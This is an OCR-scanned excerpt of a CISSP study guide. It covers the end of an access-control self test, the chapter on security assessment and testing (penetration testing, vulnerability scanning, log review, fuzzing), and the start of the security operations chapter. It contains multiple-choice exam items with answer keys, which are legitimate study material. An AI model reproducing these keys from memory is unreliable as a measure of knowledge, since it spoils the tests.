4. What authentication method exposes the password in clear text? 

A. CHAP 

B. Kerberos 

C. PAP 

D. SESAME 

5. What are the main differences between retina scans and iris scans? 

A. Retina scans are not invasive and iris scans are 

B. Iris scans invade a person’s privacy and retina scans do not 

C. Iris scans change depending on the person’s health; retina scans are stable 

D. Retina scans change depending on the person’s health; iris scans are stable 
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6 . What is the most important decision an organization needs to make when 
implementing RBAC? 

A. Each user’s security clearance needs to be finalized 

B. The roles users have on the system need to be clearly defined 

C. Users’ data needs to be clearly labeled 

D. Users’ must be segregated from one another on the IT system to prevent 
spillage of sensitive data 

7 . What access control method weighs additional factors such as time of 
attempted access before granting access? 

A. Content-dependent access control 

B. Context-dependent access control 

C. Role-based access control 

D. Task-based access control 

8. What service is known as cloud identity, and allows organizations to leverage 
cloud service for identity management? 

A. IaaS 

B. IDaaS 

C. PaaS 

D. SaaS 

9 . A type II biometric is also known as what? 

A. Crossover Error Rate (CER) 

B. Equal Error Rate (EER) 

C. False Accept Rate (FAR) 

D. False Reject Rate (FRR) 

1 0. Within Kerberos, which part is the single point of failure? 

A. The Ticket Granting Ticket 

B. The Realm 

C. The Key Distribution Center 

D. The Client-Server session key 

1 1 . What is an XML-based framework for exchanging security information, 
including authentication data? 

A. Kerberos 

B. OpenID 

C. SAML 

D. SESAME 

1 2. What protocol provides a common open protocol for interfacing and querying 
directory service information provided by network operating systems, using 
port 389 via TCP or UDP? 

A. CHAP 

B. LDAP 

C. PAP 

D. RADIUS 
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1 3. Server A trusts server B. Server B trusts Server C. Server A therefore trusts 
server C. What term describes this trust relationship? 

A. Domain trust 

B. Forest trust 

C. Nontransitive trust 

D. Transitive trust 

14. A policy that states a user must have a business requirement to view data 
before attempting to do so is an example of enforcing what? 

A. Least privilege 

B. Need to know 

C. Rotation of duties 

D. Separation of duties 

1 5. What technique would raise the False Accept Rate (FAR) and Lower the False 
Reject Rate (FRR) in a fingerprint scanning system? 

A. Decrease the amount of minutiae that is verified 

B. Increase the amount of minutiae that is verified 

C. Lengthen the enrollment time 

D. Lower the throughput time 


SELF TEST QUICK ANSWER KEY 


1 . 

A 

2. 

B 

3. 

D 

4. 

C 

5. 

D 

6. 

B 

7. 

B 

8 . 

B 

9. 

C 

10 . 

C 

11. 

C 

12 . 

B 

13. 

D 

14. 

B 

15. 

A 
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CHAPTER 


Domain 6: Security 
Assessment and Testin 
(Designing, Performing 
Analyzing Security Testing) 

EXAM OBJECTIVES IN THIS CHAPTER 

• Assessing Access Control 

• Software Testing Methods 



UNIQUE TERMS AND DEFINITIONS 

• Dynamic Testing - Tests code while executing it 

• Fuzzing - A type of black box testing that submits random, malformed data as 
inputs into software programs to determine if they will crash 

• Penetration Testing - Authorized attempt to break into an organization’s 
physical or electronic perimeter (and sometimes both) 

• Static Testing - Tests code passively: the code is not running. 

• Synthetic Transactions - Also called synthetic monitoring: involves building 
scripts or tools that simulate activities normally performed in an application 


INTRODUCTION 

Security assessment and testing are critical components of any information security 
program. Organizations must accurately assess their real-world security, focus on the 
most critical components, and make necessary changes to improve. 

In this domain we will discuss two major components of assessment and testing: 
overall security assessments (including vulnerability scanning, penetration testing, 
and security audits), and testing software via static and dynamic methods. 


ASSESSING ACCESS CONTROL 

A number of processes exist to assess the effectiveness of access control. Tests with 
a narrower scope include penetration tests, vulnerability assessments, and security 
audits. A security assessment is a broader test that may include narrower tests, such 
as penetration tests, as subsections. 


329 



330 CHAPTER 7 Doma in 6: Security Assessment and Testing 


PENETRATION TESTING 

A penetration tester is a white hat hacker who receives authorization to attempt to 
break into an organization’s physical or electronic perimeter (and sometimes both). 
Penetration tests (called “pen tests” for short) are designed to determine whether 
black hat hackers could do the same. They are a narrow, but often useful, test, espe- 
cially if the penetration tester is successful. 

Penetration tests may include the following tests: 

• Network (Internet) 

• Network (internal or DMZ) 

• War dialing 

• Wireless 

• Physical (attempt to gain entrance into a facility or room) 

Network attacks may leverage client-side attacks, server-side attacks, or Web 
application attacks. See Chapter 4, Domain 3: Security Engineering for more 
information on these attacks. War dialing uses a modem to dial a series of phone 
numbers, looking for an answering modem carrier tone (the penetration tester then 
attempts to access the answering system); the name derives from the 1983 movie 
WarGames. 

Social engineering is a no-tech or low-tech method that uses the human mind 
to bypass security controls. Social engineering may be used in combination with 
many types of attacks, especially client-side attacks or physical tests. An example of 
a social engineering attack combined with a client-side attack is emailing malware 
with a Subject line of “Category 5 Hurricane is about to hit Florida!” A physical 
social engineering attack (used to tailgate an authorized user into a building) is 
described in Chapter 4, Domain 3: Security Engineering. 

A zero-knowledge (also called black box) test is “blind”; the penetration tester 
begins with no external or trusted information, and begins the attack with public 
information only. A full-knowledge test (also called crystal-box) provides internal 
information to the penetration tester, including network diagrams, policies and pro- 
cedures, and sometimes reports from previous penetration testers. Partial-knowledge 
tests are in between zero and full knowledge: the penetration tester receives some 
limited trusted information. 

Some clients prefer the zero knowledge approach, feeling this will lead to a more 
accurate simulation of a real attacker’s process. This may be a false premise: a real 
attacker may be an insider, or have access to inside information. 

Full-knowledge testing can be far more efficient, allowing the penetration tester 
to find weaker areas more quickly. Most penetration tests have a scope that includes 
a limitation on the time spent conducting the test. Limited testing time may lead to 
a failed test, where more time could lead to success. Full-knowledge tests are also 
safer: systems are less likely to crash if the penetration tester has extensive informa- 
tion about the targets before beginning the test. 
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Penetration Testing Tools and Methodology 

Penetration testers often use penetration testing tools, which include the open source 
Metasploit (http://www.metasploit.org), and closed source Core Impact (http:// 
www.coresecurity.com) and Immunity Canvas (http://www.immunitysec.com). Pen 
testers also use custom tools, as well as malware samples and code posted to the 
Internet. 

Penetration testers use the following methodology: 

• Planning 

• Reconnaissance 

• Scanning (also called enumeration) 

• Vulnerability assessment 

• Exploitation 

• Reporting 

Black hat hackers typically follow a similar methodology (though they may per- 
form less planning, and obviously omit reporting). Black hats will also cover their 
tracks (erase logs and other signs of intrusion), and frequently violate system integ- 
rity by installing back doors (in order to maintain access). A penetration tester should 
always protect data and system integrity. 


NOTE 

Penetration tests are sometimes controversial. Some argue that a penetration test really tests the 
skill of the penetration tester, and not the perimeter security of an organization. If a pen test is 
successful, there is value to the organization. But what if the penetration test fails? Did it fail 
because there is no perimeter risk? Or did it fail because the penetration tester lacked the skill or the 
time to complete the test? Or did it fail because the scope of the penetration test was too narrow? 


Assuring Confidentiality, Data Integrity and System Integrity 

Penetration testers must ensure the confidentiality of any sensitive data that is 
accessed during the test. If the target of a penetration test is a credit card database, 
the penetration tester may have no legal right to view or download the credit cards. 
Testers will often request that a dummy file containing no regulated or sensitive data 
(sometimes called a flag) be placed in the same area of the system as the credit card 
data, and protected with the same permissions. If the tester can read and/or write to 
that file, then they prove they could have done the same to the credit card data. 

Penetration testers must be sure to ensure the system integrity and data integrity 
of their client’s systems. Any active attack (where data is sent to a system, as opposed 
to a passive read-only attack) against a system could potentially cause damage: this 
can be true even for an experienced penetration tester. This risk must be clearly 
understood by all parties: tests are often performed during change maintenance 
windows for this reason. 


332 CHAPTER 7 Doma in 6: Security Assessment and Testing 


One potential issue that should be discussed before the penetration test com- 
mences is the risk of encountering signs of a previous or current successful malicious 
attack. Penetration testers sometimes discover that they are not the first attacker to 
compromise a system: someone has beaten them to it. Attackers will often become 
more malicious if they believe they have been discovered, sometimes violating data 
and system integrity. The integrity of the system is at risk in this case, and the pen- 
etration tester should end the penetration test, and immediately escalate the issue. 

Finally, the final penetration test report should be protected at a very high level: 
it contains a roadmap to attack the organization. 

VULNERABILITY TESTING 

Vulnerability scanning (also called vulnerability testing) scans a network or system 
for a list of predefined vulnerabilities such as system misconhguration, outdated 
software, or a lack of patching. A vulnerability testing tool such as Nessus (http:// 
www.tenable.com/products/nessus-vulnerability-scanner) or OpenVAS (http:// 
www.openvas.org) may be used to identify the vulnerabilities. 

We learned that Risk = Threat x Vulnerability in Chapter 2, Domain 1 : Security 
and Risk Management. It is important to remember that vulnerability scanners only 
show half of the risk equation: their output must be matched to threats to map true 
risk. This is an important half to identify, but these tools only perform part of the total 
job. Many organizations fall into the trap of viewing vulnerabilities without matching 
them to threats, and thus do not understand or mitigate true business risk. 

SECURITY AUDITS 

A security audit is a test against a published standard. Organizations may be audited 
for PCI-DSS (Payment Card Industry Data Security Standard, discussed in Chapter 3, 
Domain 2: Asset Security) compliance, for example. PCI-DSS includes many required 
controls, such as firewalls, specific access control models, and wireless encryption. 
An auditor then verifies a site or organization meets the published standard. 

SECURITY ASSESSMENTS 

Security assessments are a holistic approach to assessing the effectiveness of access 
control. Instead of looking narrowly at penetration tests or vulnerability assessments, 
security assessments have a broader scope. 

Security assessments view many controls across multiple domains, and may 
include the following: 

• Policies, procedures, and other administrative controls 

• Assessing the real world-effectiveness of administrative controls 

• Change management 

• Architectural review 

• Penetration tests 
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• Vulnerability assessments 

• Security audits 

As the above list shows, a security assessment may include other distinct tests, 
such as penetration tests. The goal is to broadly cover many other specific tests, to 
ensure that all aspects of access control are considered. 


INTERNAL AND THIRD PARTY AUDITS 

Security professionals routinely play a significant role in audits. In audits, the 
expectation is that an organization is being measured against a particular standard. 
While more loose usage of the word audit is employed, even with purely internal 
auditing the organization is assessing adherence to practices that they have deemed 
appropriate. 

Organizations routinely undergo a variety of audits against various standards on 
an almost continuous basis. Some of these audits might simply involve self-reporting 
to a third party or be carried out solely for internal use by the organization. These 
audits should be conducted by only internal resources. Quite often, however, external 
auditors will be performing their own evaluation of an organization for report pur- 
poses. In either case, security professionals frequently play a role in the collection 
and communication of answers to specific requests, response and remediation of 
audit findings, and demonstrating effective mitigations that might prevent a negative 
finding. 


LOG REVIEWS 

As a security control, logs can and should play a vital role in detection of security 
issues, greatly inform incident response, and further forensic review. From an 
assessment and testing standpoint, the goal is to review logs to ensure they can 
support information security as effectively as possible. 

Reviewing security audit logs within an IT system is one of the easiest ways to 
verify that access control mechanisms are performing adequately. Reviewing audit 
logs is primarily a detective control. 

According to NIST Special Publication 800-92 (http://csrc.nist.gov/publications/ 
nistpubs/800-92/SP800-92.pdf), the following log types should be collected: 

• Network Security Software/Hardware: 

• Antivirus logs 

• IDS/IPS logs 

• Remote Access Software (such as VPN logs) 

• Web proxy 

• Vulnerability management 

• Authentication servers 

• Routers and firewalls 
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• Operating System: 

• System events 

• Audit records 

• Applications 

• Client requests and server responses 

• Usage information 

• Significant operational actions [1] 

The intelligence gained from proactive audit log management and monitoring 
can be very beneficial: the collected antivirus logs of thousands of systems can give 
a very accurate picture of the current state of malware. Antivirus alerts combined 
with a spike in failed authentication alerts from authentication servers or a spike in 
outbound firewall denials may indicate that a password-guessing worm is attempting 
to spread on a network. 

According to “Five mistakes of Log Analysis” by Anton Chuvakin (see http:// 
www.computerworld.com/s/article/96587/Five_mistakes_of_log_analysis), audit 
record management typically faces five distinct problems: 

1 . Logs are not reviewed on a regular and timely basis. 

2. Audit logs and audit trails are not stored for a long enough time period. 

3. Logs are not standardized or viewable by correlation toolsets — they are only 
viewable from the system being audited. 

4. Log entries and alerts are not prioritized. 

5. Audit records are only reviewed for the “bad stuff.” [2] 

Many organizations collect audit logs, and then commit one or more of these 
types of mistakes. The useful intelligence referenced in the previous section (iden- 
tifying worms via antivirus alerts, combined with authentication failures or firewall 
denials) is only possible if these mistakes are avoided. 

Centralized Logging 

Centralized log storage should be configured. Having logs in a central repository allows 
for more scalable security monitoring and intrusion detection capabilities. A central- 
ized log repository can also help to verify the integrity of log information should the 
endpoint’s view of the logs be corrupted or intentionally altered. Ensuring the integrity 
of log information should be considered when transmitting and storing log data. 


NOTE 

Syslog, the most widely used logging subsystem, by default transmits log data in plaintext over 
UDP/5 14 when sending data to a remote server. UDP, a transport protocol that does not guarantee 
the delivery of transmissions, has implications for ensuring the continuity of logging. This means 
that the central log server might not have received all the log data, even though the endpoint has no 
facility for knowing that it failed to be delivered successfully. The plaintext nature of Syslog means 
that a suitably positioned adversary could see the (potentially sensitive) log data as it traverses the 
network. Syslog messages may also be spoofed due to the lack of authentication, lack of encryption, 
and use of UDP as the layer 4 transport protocol. 
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In addition to the centralized logs, preferably at least some limited recent logs 
should be maintained on the endpoint system itself. Having local logs in addition to 
the centralized log store can help in several ways. Should the continuity of logging 
be disrupted, the logs might still be able to be recovered from the endpoint. If an 
adversary intentionally corrupts or edits the logs on the endpoint comparing the 
differences can guide incident response to the adversary activities. 

Log Retention 

A retention and rotation policy for log information should be created and maintained. 
The retention and rotation should vary depending upon the source of the log, the 
type of logged information, and the practical value of the log information. Having 
a tremendous volume of log data that is categorically ignored provides very little 
value, and can also make finding meaningful data in the rest of the logs more chal- 
lenging. While the security value of the log information is important, log retention 
can also be relevant to legal or regulatory compliance matters. Legal or regulatory 
considerations must be accounted for when considering log retention. 


SOFTWARE TESTING METHODS 

In addition to the testing the features and stability of the software, software testing 
increasingly focuses on discovering specific programmer errors (such as lack of 
bounds checking) that could lead to vulnerabilities that increase the risk of system 
compromise. 

Unlike off-the-shelf applications, custom developed applications don’t have a 
vendor providing security patches on a routine basis. The onus is on the organization 
developing the application to discover these flaws. Source code review of custom de- 
veloped applications is one of the key approaches employed in application security. 

Two general approaches to automated code review exist: static and dynamic anal- 
ysis. The CISSP also calls out manual code review, which simply implies a knowl- 
edgeable person reviewing the code manually. Pair programming, employed in agile 
software development shops, (discussed in Chapter 9, Domain 8: Software Develop- 
ment Security) could be considered an example of manual source code review. 

STATIC AND DYNAMIC TESTING 

Static testing tests the code passively; the code is not running. This includes walk- 
throughs, syntax checking, and code reviews. Static analysis tools review the raw 
source code itself looking for evidence of known insecure practices, functions, 
libraries, or other characteristics having been used in the source code. The Unix 
program ‘lint’ performed static testing for C programs. 

Code compiler warnings can also be considered a ‘lite’ form of static analysis. 
The C compiler GCC (Gnu Compiler Collection, see: https://gcc.gnu.org) contains 
static code analysis features: “The gcc compiler includes many of the features of lint, 
the classic C program verifier, and then some. . . The gcc compiler can identify many 


336 CHAPTER 7 Doma in 6: Security Assessment and Testing 



FIGURE 7.1 

Sample Requirements Traceability Matrix [4] 

C program constructs that pose potential problems, even for programs that conform 
to the syntax rules of the language. For instance, you can request that the compiler 
report whether a variable is declared but not used, a comment is not properly termi- 
nated, or a function returns a type not permitted in older versions of C.” Please note 
that GCC itself is not testable, it is given as an example of a compiler with static 
testing capabilities. [3] 

Dynamic testing tests the code while executing it. With dynamic testing, security 
checks are performed while actually running or executing the code or application 
under review. 

Both approaches are appropriate and complement each other. Static analysis tools 
might uncover flaws in code that have not even yet been fully implemented in a way 
that would expose the flaw to dynamic testing. However, dynamic analysis might 
uncover flaws that exist in the particular implementation and interaction of code that 
static analysis missed. 

White box software testing gives the tester access to program source code, data 
structures, variables, etc. Black box testing gives the tester no internal details: the 
software is treated as a black box that receives inputs. 

TRACEABILITY MATRIX 

A Traceability Matrix (sometimes called a Requirements Traceability Matrix, or 
RTM) can be used to map customers’ requirements to the software testing plan: 
it “traces” the “requirements,” and ensures that they are being met. It does this by 
mapping customer use cases to test cases. Figure 7.1 shows a sample Requirements 
Traceability Matrix. 

SYNTHETIC TRANSACTIONS 

Synthetic transactions, or synthetic monitoring, involves building scripts or tools 
that simulate activities normally performed in an application. The typical goal of 
using synthetic transactions/monitoring is to establish expected norms for the perfor- 
mance of these transactions. These synthetic transactions can be automated to run on 
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a periodic basis to ensure the application is still performing as expected. These types 
of transactions can also be useful for testing application updates prior to deployment 
to ensure the functionality and performance will not be negatively impacted. This 
type of testing or monitoring is most commonly associated with custom developed 
web applications. 

The Microsoft TechNet article Monitoring by Using Synthetic Transactions 
describes synthetic transactions: “For example, for a Web site, you can create a 
synthetic transaction that performs the actions of a customer connecting to the site and 
browsing through its pages. For databases, you can create transactions that connect 
to the database. You can then schedule these actions to occur at regular intervals to 
see how the database or Web site reacts and to see whether your monitoring settings, 
such as alerts and notifications, also react as expected.” [5] 

SOFTWARE TESTING LEVELS 

It is usually helpful to approach the challenge of testing software from multiple 
angles, addressing various testing levels, from low to high. The software testing 
levels of Unit Testing, Installation Testing, Integration Testing, Regression Testing, 
and Acceptance Testing are designed to accomplish that goal: 

• Unit Testing-. Low-level tests of software components, such as functions, 
procedures or objects 

• Installation Testing : Testing software as it is installed and first operated 

• Integration Testing : Testing multiple software components as they are 
combined into a working system. Subsets may be tested, or Big Bang 
integration testing tests all integrated software components 

• Regression Testing: Testing software after updates, modifications, or patches 

• Acceptance Testing: testing to ensure the software meets the customer’s 
operational requirements. When this testing is done directly by the customer, it 
is called User Acceptance Testing. 

FUZZING 

Fuzzing (also called fuzz testing ) is a type of black box testing that submits random, 
malformed data as inputs into software programs to determine if they will crash. 
A program that crashes when receiving malformed or unexpected input is likely to 
suffer from a boundary checking issue, and may be vulnerable to a buffer overflow 
attack. 

Fuzzing is typically automated, repeatedly presenting random input strings as 
command line switches, environment variables, and program inputs. Any program 
that crashes or hangs has failed the fuzz test. 

Fuzzing can be considered a particular type of dynamic testing. Fuzzers are sim- 
ply used to automate providing input to the application. Many people commonly 
associate fuzzers specifically with uncovering simple buffer overflow conditions. 
Flowever, advanced and custom fuzzers will do more than simply provide tremendous 
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Table 7.1 NIST Pairwise Testing Example [7] 


Test 

case 

OS 

CPU 

Protocol 

i 

Windows 

Intel 

IPv4 

2 

Windows 

AMD 

IPv6 

3 

Linux 

Intel 

IPv6 

4 

Linux 

AMD 

IPv4 


volume of input to an application. Fuzzers can and have been used to uncover much 
more complex flaws than the traditional buffer overflow flaws. 

COMBINATORIAL SOFTWARE TESTING 

Combinatorial software testing is a black-box testing method that seeks to identify 
and test all unique combinations of software inputs. An example of combinatorial 
software testing is pairwise testing (also called all pairs testing). 

NIST gives the following example of pairwise testing (see: http://csrc.nist.gov/ 
groups/SNS/acts/documents/kuhn-kacker-lei-hunter09.pdf), “Suppose we want to 
demonstrate that a new software application works correctly on PCs that use the 
Windows or Linux operating systems, Intel or AMD processors, and the IPv4 or IPv6 
protocols. This is a total of2x2x2 = 8 possibilities but, as (Table 7.1) shows, 
only four tests are required to test every component interacting with every other 
component at least once. In this most basic combinatorial method, known as pairwise 
testing, at least one of the four tests covers all possible pairs (t = 2) of values among 
the three parameters.” [6] 

MISUSE CASE TESTING 

Software design has historically focused on developing code to provide desired or 
required functionality. While security requirements might well be defined for an 
application in development, they are rarely required to achieve the desired goals for 
the application’s design. 

Use cases for applications spell out how various functionality is going to be 
leveraged within an application. Formal use cases are typically built as a flow 
diagram, written in UML (Unified Modeling Language), and are created to help 
model expected behavior and functionality. 

The idea of misuse case testing is to formally model, again most likely using 
UML, how security impact could be realized by an adversary abusing the applica- 
tion. This can be seen simply as a different type of use case, but the reason for calling 
out misuse case testing specifically is to highlight the general lack of considering 
attacks against the application. 

A more formal and commonly recognized way to consider negative security out- 
comes in software development is threat modeling. Threat modeling has become 
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significantly more prominent in recent years given Microsoft’s highlighting its 
importance in their Security Development Lifecycle (SDL). 


TEST COVERAGE ANALYSIS 

Test or code coverage analysis attempts to identify the degree to which code testing 
applies to the entire application. The goal is to ensure there are no significant gaps 
where a lack of testing could allow for bugs or security issues to be present that 
otherwise should have been discovered. 

INTERFACE TESTING 

Traditional interface testing within applications is primarily concerned with 
appropriate functionality being exposed across all the ways users can interact 
with the application. From a security-oriented vantage point, the goal is to ensure 
that security is uniformly applied across the various interfaces. Effectively, this type 
of testing considers varied potential attack vectors an adversary could leverage. 

A simplified example of this might be a web application that uses Adobe Flash 
when a client presents with that capability, but will present an alternative view to 
clients that lack support for Adobe Flash. If testing was only performed with a desk- 
top browser that had Flash support built-in, then security flaws that are present in 
the mobile version of the application presented to iPhones might well be missed. 
While interface testing encompasses more than just desktop vs. mobile browser, the 
concept still applies. An application’s security requirements must be implemented 
regardless of how a person or machine is interfacing with the code. 


ANALYZE AND REPORT TEST OUTPUTS 

Accumulating vast quantities of security test results is easy; actually improving secu- 
rity based on those results is much more difficult. An example of this is organizations 
performing vulnerability scans on an almost continuous basis. Flowever, simply pro- 
ducing that report does nothing to actually improve upon the situation. Producing the 
security testing data is a necessary first step, but is not sufficient alone to improve 
future test results. 

The volume of data to be analyzed is likely staggering, but an approach should be 
employed to prioritize reviewing and acting on some results before others. As with 
many things in security, the approach to triage should be informed by an understand- 
ing of risk. Imagine the exact same flaw or vulnerability existed on every system in 
an organization. Would the risk associated with each vulnerability be the same? No, 
of course not. Even though the exact same flaw exists the risk could be drastically 
different based upon, for example, the criticality of the system or data, and the likeli- 
hood of an adversary being able to exploit each particular manifestation of the flaw. 

The organization should already have significant data that speaks to confidential- 
ity, integrity, and availability concerns for business assets. This data should be used 
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to inform the analysis of security testing output. Depending upon how easily con- 
sumable the risk data is, some basic prioritization and analysis might be able to be 
automated. Certainly other data will require manual review, at least initially, but to 
the extent possible should be documented in a way that helps better automate future 
test data review. 


SUMMARY OF EXAM OBJECTIVES 

In this domain we have learned about various methods to test real-world security of an 
organization, including vulnerability scanning, penetration testing, security assess- 
ments, and audits. Vulnerability scanning determines one half of the “Risk = Threat 
x Vulnerability” equation. Penetration tests seek to match those vulnerabilities with 
threats, to demonstrate real-world risk. Assessments provide a broader view of the 
security picture, and audits demonstrate compliance with a published specification, 
such as PCI-DSS. 

We discussed testing code security, including static methods such as source code 
analysis, walkthroughs, syntax checking, and use of secure compilers. We discussed 
dynamic methods used on running code, including fuzzing and various forms of 
black box testing. We also discussed Synthetic transactions, which attempt to emu- 
late real-world uses of an application through the use of scripts or tools that simulate 
activities normally performed in an application. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


1 . Which software testing level tests software after updates, modifications, or 
patches? 

A. Acceptance testing 

B. Integration testing 

C. Regression testing 

D. Unit testing 

2. What is a type of testing that submits random malformed data as inputs into 
software programs to determine if they will crash? 

A. Black box testing 

B. Combinatorial testing 

C. Fuzzing 

D. Pairwise testing 
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3 . What type of software testing tests code passively? 

A. Black box testing 

B. Dynamic testing 

C. Static testing 

D. White box testing 

4 . What type of penetration test begins with no external or trusted information, 
and begins the attack with public information only? 

A. Full knowledge 

B. Partial knowledge 

C. Grey box 

D. Zero knowledge 

5 . What type of assessment would best demonstrate an organizations’ compliance 
with PCI-DSS (Payment Card Industry Data Security Standard)? 

A. Audit 

B. Penetration test 

C. Security assessment 

D. Vulnerability assessment 

6 . What type of test provides internal information to the penetration tester, 
including network diagrams, policies and procedures, and sometimes reports 
from previous penetration testers? 

A. Full knowledge 

B. Partial knowledge 

C. Grey box 

D. Zero knowledge 

7 . What can be used to ensure software meets the customer’s operational 
requirements? 

A. Integration testing 

B. Installation testing 

C. Acceptance testing 

D. Unit testing 

8. What term describes a no-tech or low-tech method that uses the human mind to 
bypass security controls? 

A. Fuzzing 

B. Social engineering 

C. War dialing 

D. Zero-knowledge test 

9 . What term describes a black-box testing method that seeks to identify and test 
all unique combinations of software inputs? 

A. Combinatorial software testing 

B. Dynamic testing 

C. Misuse case testing 

D. Static Testing 
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10. What term describes a holistic approach for determining the effectiveness of 
access control, and has a broad scope? 

A. Security assessment 

B. Security audit 

C. Penetration test 

D. Vulnerability assessment 

Use the following scenario to answer questions 1 1 through 14: 

You are the CISO of a large bank and have hired a company to provide 
an overall security assessment, and also provide a penetration test of 
your organization. Your goal is to determine overall information security 
effectiveness. You are specifically interested in determining if theft of financial 
data is possible. 

Your bank has recently deployed a custom-developed three-tier web 
application that allows customers to check balances, make transfers, and 
deposit checks by taking a photo with their smartphone and then uploading the 
check image. In addition to a traditional browser interface, your company has 
developed a smartphone app for both Apple iOS and Android devices. 

The contract has been signed, and both scope and rules of engagement have 
been agreed upon. A 24/7 operational IT contact at the bank has been made 
available in case of any unexpected developments during the penetration test, 
including potential accidental disruption of services. 

1 1 . Assuming the penetration test is successful: what is the best way for the 
penetration testing firm to demonstrate the risk of theft of financial data? 

A. Instruct the penetration testing team to conduct a thorough vulnerability 
assessment of the server containing financial data 

B. Instruct the penetration testing team to download financial data, redact it, 
and report accordingly 

C. Instruct the penetration testing team that they may only download financial 
data via an encrypted and authenticated channel 

D. Place a harmless ‘flag’ file in the same location as the financial data, and 
inform the penetration testing team to download the flag 

1 2. What type of penetration test will result in the most efficient use of time and 
hourly consultant expenses? 

A. Automated knowledge 

B. Full knowledge 

C. Partial Knowledge 

D. Zero Knowledge 

1 3. You would like to have the security firm test the new web application, but have 
decided not to share the underlying source code. What type of test could be 
used to help determine the security of the custom web application? 

A. Secure compiler warnings 

B. Fuzzing 

C. Static testing 

D. White box testing 
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14. During the course of the penetration test: the testers discover signs of an active 
compromise of the new custom-developed three-tier web application. What is 
their best source of action? 

A. Attempt to contain and eradicate the malicious activity 

B. Continue the test 

C. Quietly end the test, immediately call the operational IT contact, and 
escalate the issue 

D. Shut the server down 

1 5. Drag and drop: Which of the following statements about Syslog are true? Drag 
and drop all correct answers from left to right. 

Possible Answers Correct Answers 


/ \ 

Uses UDP 

k. _j 






Easily spoofed 

V / 

FIGURE 7.2 

Drag and Drop 


SELF TEST QUICK ANSWER KEY 

1. c 

2. C 

3. C 

4. D 
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5. A 

6. A 

7. C 

8. B 

9. A 

10. A 

11. D 

12. B 

13. B 

14. C 

15 . 


Possible Answers Correct Answers 


/ \ 

Uses TCP 

s. > 


/ \ 

Data is encrypted 

v / 


/ \ 

Authenticated 
< > 


FIGURE 7.3 


/ \ 

Uses UDP 

s > 


/ \ 

Data is plaintext 

v / 


/ \ 

Easily spoofed 

v > 


Drag and Drop - Answer 
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CHAPTER 


Domain 7: Security 
Operations (e.g., 
Foundational Concepts, 
Investigations, Incident 
Management, Disaster 
Recovery) 

EXAM OBJECTIVES IN THIS CHAPTER 

• Administrative Security 

• Forensics 

• Incident Response Management 

• Operational Preventive and Detective Controls 

• Asset Management 

• Continuity of Operations 

• BCP and DRP Overview and Process 

• Developing a BCP/DRP 

• Backups and Availability 

• DRP Testing, Training and Awareness 

• Continued BCP/DRP Maintenance 

• Specific BCP/DRP Frameworks 



UNIQUE TERMS AND DEFINITIONS 

• Business Continuity Plan (BCP) — a long-term plan to ensure the continuity of 
business operations 

• Collusion — An agreement between two or more individuals to subvert the 
security of a system 

• Continuity of Operations Plan (COOP) — a plan to maintain operations during a 
disaster. 

• Disaster — any disruptive event that interrupts normal system operations 
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• Disaster Recovery Plan (DRP) — a short-term plan to recover from a disruptive event 

• Mean Time Between Failures (MTBF) — quantifies how long a new or repaired 
system will run on average before failing 

• Mean Time to Repair (MTTR) — describes how long it will take to recover a 
failed system 

• Mirroring — Complete duplication of data to another disk, used by some levels 
of RAID" 

• Redundant Array of Inexpensive Disks (RAID) — A method of using multiple 
disk drives to achieve greater data reliability, greater speed, or both 

• Striping — Spreading data writes across multiple disks to achieve performance 
gains, used by some levels of RAID 


INTRODUCTION 

Security Operations is concerned with threats to a production operating environment. 
Threat agents can be internal or external actors, and operations security must account 
for both of these threat sources in order to be effective. Ultimately operations security 
centers on the fact that people need appropriate access to data. This data will exist 
on some particular media, and is accessible by means of a system. So operations 
security is about people, data, media, hardware, and the threats associated with each 
of these in a production environment. 

Disaster Recovery Planning (DRP) has emerged as a critical component of the 
Common Body of Knowledge. Our world of the past 15 years has experienced many 
disruptive events: terrorism, earthquakes, hurricanes, tsunamis, floods, and the list 
goes on. Business Continuity and Disaster Recovery Planning are an organization’s 
last line of defense: when all other controls have failed, BCP/DRP is the final 
control that may prevent drastic events such as injury, loss of life, or failure of an 
organization. As information security professionals, we must be vigilant, and protect 
our organizations and staff from these disruptive events. 


ADMINISTRATIVE SECURITY 

All organizations contain people, data, and means for people to use the data. A fun- 
damental aspect of operations security is ensuring that controls are in place to inhibit 
people either inadvertently or intentionally compromising the confidentiality, integ- 
rity, or availability of data or the systems and media holding that data. Administrative 
Security provides the means to control people’s operational access to data. 

ADMINISTRATIVE PERSONNEL CONTROLS 

Administrative Personnel Controls represent important operations security concepts 
that should be mastered by the CISSP® candidate. These are fundamental concepts 
within information security that permeate through multiple domains. 
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Least Privilege or Minimum Necessary Access 

One of the most important concepts in all of information security is that of the prin- 
ciple of least privilege. The principle of least privilege dictates that persons have no 
more than the access that is strictly required for the performance of their duties. The 
principle of least privilege may also be referred to as the principle of minimum nec- 
essary access. Regardless of name, adherence to this principle is a fundamental tenet 
of security, and should serve as a starting point for administrative security controls. 

Although the principle of least privilege is applicable to organizations leverag- 
ing Mandatory Access Control (MAC), the principle’s application is most obvious in 
Discretionary Access Control (DAC) environments. With DAC, the principle of least 
privilege suggests that a user will be given access to data if, and only if, a data owner 
determines that a business need exists for the user to have the access. With MAC, we 
have a further concept that helps to inform the principle of least privilege: need to know. 

Need to Know 

In organizations with extremely sensitive information that leverage Mandatory 
Access Control (MAC), basic determination of access is enforced by the system. The 
access determination is based upon clearance levels of subjects and classification 
levels of objects. Though the vetting process for someone accessing highly sensi- 
tive information is stringent, clearance level alone is insufficient when dealing with 
the most sensitive of information. An extension to the principle of least privilege in 
MAC environments is the concept of compartmentalization. 

Compartmentalization, a method for enforcing need to know, goes beyond the 
mere reliance upon clearance level and necessitates simply that someone requires 
access to information. Compartmentalization is best understood by considering a 
highly sensitive military operation: while there may be a large number of individuals 
(some of high rank), only a subset “need to know” specific information. The others 
have no “need to know,” and therefore no access. 

Separation of Duties 

While the principle of least privilege is necessary for sound operational security, 
in many cases it alone is not a sufficient administrative control. As an example, 
imagine that an employee has been away from the office for training, and has 
submitted an expense report indicating $1,000,000 was needed for reimbursement. 
This individual happens to be a person who, as part of her daily duties, had access to 
print reimbursement checks, and would therefore meet the principle of least privilege 
for printing her own reimbursement check. Should she be able to print herself a 
nice big $1,000,000 reimbursement check? While this access may be necessary for 
her job function, and thus meet the requirements for the principle of least privilege, 
additional controls are required. 

The example above serves to illustrate the next administrative security control, 
separation of duties. Separation of duties prescribes that multiple people are required 
to complete critical or sensitive transactions. The goal of separation of duties is to 
ensure that in order for someone to be able to abuse their access to sensitive data or 
